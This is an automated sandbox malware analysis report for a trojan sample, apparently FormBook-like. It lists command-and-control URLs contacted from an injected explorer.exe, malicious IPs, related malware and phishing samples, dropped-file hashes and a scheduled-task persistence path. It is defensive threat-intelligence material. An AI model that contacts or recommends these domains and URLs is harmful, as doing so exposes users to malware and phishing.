http://www.dandevonald.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.insurancebygarry.com/gy15/www.mariaslakedistrict.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.insurancebygarry.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.midsouthhealthcare.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000009.00000002.4572315020.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145350381.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145316957.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jwoalhbn.xyz/gy15/www.99812.photos	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mariaslakedistrict.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tqqft8l5.xyz	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dandevonald.com/gy15/www.carmen-asa.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vivehogar.netReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tqqft8l5.xyz/gy15/www.jwoalhbn.xyz	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.286live.com/gy15/www.vivehogar.net	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rs-alohafactorysaleuua.shopReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oiupa.xyzReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.midsouthhealthcare.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carmen-asa.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vivehogar.net	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ttyijlaw.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.incrediblyxb.christmas/gy15/www.dunia188j.store	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rs-alohafactorysaleuua.shop	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carmen-asa.comReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com-	explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dunia188j.storeReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.incrediblyxb.christmas	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mariaslakedistrict.com/gy15/	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jwoalhbn.xyzReferer:	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.midsouthhealthcare.com/gy15/www.286live.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oiupa.xyz/gy15/	explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comEMd	explorer.exe, 00000009.00000000.2160546176.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ttyijlaw.com/gy15/www.incrediblyxb.christmas	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.20allhen.online	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carmen-asa.com/gy15/www.rs-alohafactorysaleuua.shop	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.20allhen.online/gy15/www.ttyijlaw.com	explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.134.182	www.dandevonald.com	United States	13335	CLOUDFLARENETUS	true
157.53.227.1	www.carmen-asa.com	United States	36236	NETACTUATEUS	true
3.33.130.190	rs-alohafactorysaleuua.shop	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482965
Start date and time:	2024-07-26 12:44:01 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@296/11@13/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 211 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:44:51	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe modified
06:44:53	API Interceptor	16x Sleep call for process: powershell.exe modified
06:44:54	API Interceptor	1x Sleep call for process: KfYvtUBOq.exe modified
06:45:00	API Interceptor	7740092x Sleep call for process: explorer.exe modified
06:45:36	API Interceptor	6977798x Sleep call for process: rundll32.exe modified
12:44:53	Task Scheduler	Run new task: KfYvtUBOq path: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
157.53.227.1	http://goofle.com	Get hash	malicious	Unknown	Browse
	https://www.landpage-preview.com/51b82e8d-f243-4317-9054-fa7b6c00d3d3	Get hash	malicious	HTMLPhisher	Browse
	http://tracking.42-01pr5-osm-secure.co.uk/track/click.php?wcc=aa0d0185f4cc54b0d789627bf554a4e4&wchwcli=1205007	Get hash	malicious	Unknown	Browse
	http://tracking.42-01pr5-osm-secure.co.uk/track/click.php?wcc=aa0d0185f4cc54b0d789627bf554a4e4&wchwcli=1205007	Get hash	malicious	Unknown	Browse
3.33.130.190	OPEN BALANCE.exe	Get hash	malicious	FormBook	Browse	www.kawambwa-sugar.com/gjm3/
	LisectAVT_2403002B_179.exe	Get hash	malicious	Unknown	Browse	knowledgesutra.com/img/temp/head.png?pr=gJ4WK%2FSUh%2FzMhRMw9YLJ8MSTUivqg4b8xZNUK%2B%2FbxWq1SfkIYQgN
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.voltvanbage.com/ty31/?nfuxZr=pvoYkEQqz69527F4Qhx2M+MeCU1a+z7bzQV0Ei+DgnmcPIGjoq6QmApJNCtoApqDhYhBEB02Pg==&v6AxO=1bjHLvGh8ZYHMfZp
	stock request.exe	Get hash	malicious	FormBook	Browse	www.nofor36.org/144n/
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.emplealegal.com/hfhf/?6lBX5p6=ct9WsoIrMyG15BIb/aeJjsCOPIOlNMtYEwl7br9XhYnpuK8wszquVgiJVEddqIG+KiEl&Kjsl=FbuD_t_HwtJdin
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	www.primerpaintjobs.com/d5fo/
	irlsever.doc	Get hash	malicious	FormBook	Browse	www.gotvoom.pro/yagd/
	LisectAVT_2403002C_89.exe	Get hash	malicious	FormBook	Browse	www.hoppehour.com/hsot/?Gxlpd=wG2o1At+WZieObprlK4gt3or+R79FqGo8JWOautkSwtC0gaL3bnAN483BIjKb3NjufvQaHXgKA==&5j=Sjth
	rFormulariodeso.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.thepicklematch.com/pz12/?gv5=vWouWvmgWIWqsm7oCOFCcA3ZS+Agm3dOahf/0vyzNNVjrAYqm8JklOZclUMVobs+3i1F&tVj0=J48xD
	4azjP1pzssf79mP.exe	Get hash	malicious	FormBook	Browse	www.dnwgt80508yoec8pzq.top/v15n/?GrJhCVK=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ97MZ3vWSbL9&VVtlU=-Z1l7Dz0tnQh3p1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gtml.huksa.huhusddfnsuegcdn.com	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	194.41.37.232

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETACTUATEUS	(No subject) (33).eml	Get hash	malicious	Unknown	Browse	104.225.98.131
	DRKi1Olgjp.elf	Get hash	malicious	Mirai, Moobot	Browse	104.225.126.253
	arm7-20240623-2204.elf	Get hash	malicious	Mirai	Browse	102.67.167.234
	D2XjA30YmD.elf	Get hash	malicious	Mirai	Browse	209.170.137.182
	gt4t3NAdEr.elf	Get hash	malicious	Mirai	Browse	157.53.160.229
	https://www.finetipmedia.com/wp-admin/js/box/login.php?	Get hash	malicious	Unknown	Browse	104.160.240.21
	bot.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	157.53.166.4
	bot.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	157.53.34.207
	Ixq2ypphWQ.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	157.53.212.165
	https://www.finetipmedia.com/wp-admin/js/box/login.php?	Get hash	malicious	Unknown	Browse	104.160.240.21
CLOUDFLARENETUS	https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=	Get hash	malicious	Phisher	Browse	188.114.96.3
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxm	Get hash	malicious	HTMLPhisher	Browse	172.67.159.233
	https://forms.office.com/r/WH4W8hyyNA	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeam	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1j	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
AMAZONEXPANSIONGB	OPEN BALANCE.exe	Get hash	malicious	FormBook	Browse	3.33.244.179
	http://att-108796-103800.weeblysite.com/	Get hash	malicious	Unknown	Browse	3.33.220.150
	http://telstra-107506.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://erratic-mellow-comte.glitch.me/public/nfcu703553.HTML	Get hash	malicious	HTMLPhisher	Browse	3.33.220.150
	http://telstra-107152.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	Jeffrey.laws Replay VM (01m27sec).docx	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://we.tl/t-RErWU1YgQS	Get hash	malicious	Unknown	Browse	52.223.40.198
	LisectAVT_2403002B_179.exe	Get hash	malicious	Unknown	Browse	3.33.130.190
	Quotation.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	stock request.exe	Get hash	malicious	FormBook	Browse	3.33.130.190

Process:	C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
MD5:	C961E3496AA47D8AF3F9E184D4F78133
SHA1:	0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
SHA-256:	303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
SHA-512:	C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2m55bhzl.3io.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
